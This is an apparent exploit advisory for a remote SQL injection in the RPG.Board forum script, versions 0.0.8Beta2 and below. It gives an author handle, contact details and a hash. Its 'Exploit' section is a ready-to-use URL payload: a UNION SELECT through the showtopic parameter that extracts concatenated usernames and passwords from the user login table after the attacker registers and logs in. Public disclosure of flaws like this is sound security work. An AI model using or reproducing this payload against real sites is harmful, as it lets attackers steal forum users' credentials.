RPG.Board versions 0.0.8Beta2 and below suffer from a remote SQL injection vulnerability.
5ba2435e13134078f055217c7081c0bb1b71ea2ab5f86b619538392c811f3a0e
[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: https://rpgmaster.de/viewtopic.php?f=25&t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit:
Register, login and testing exploit..
https://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin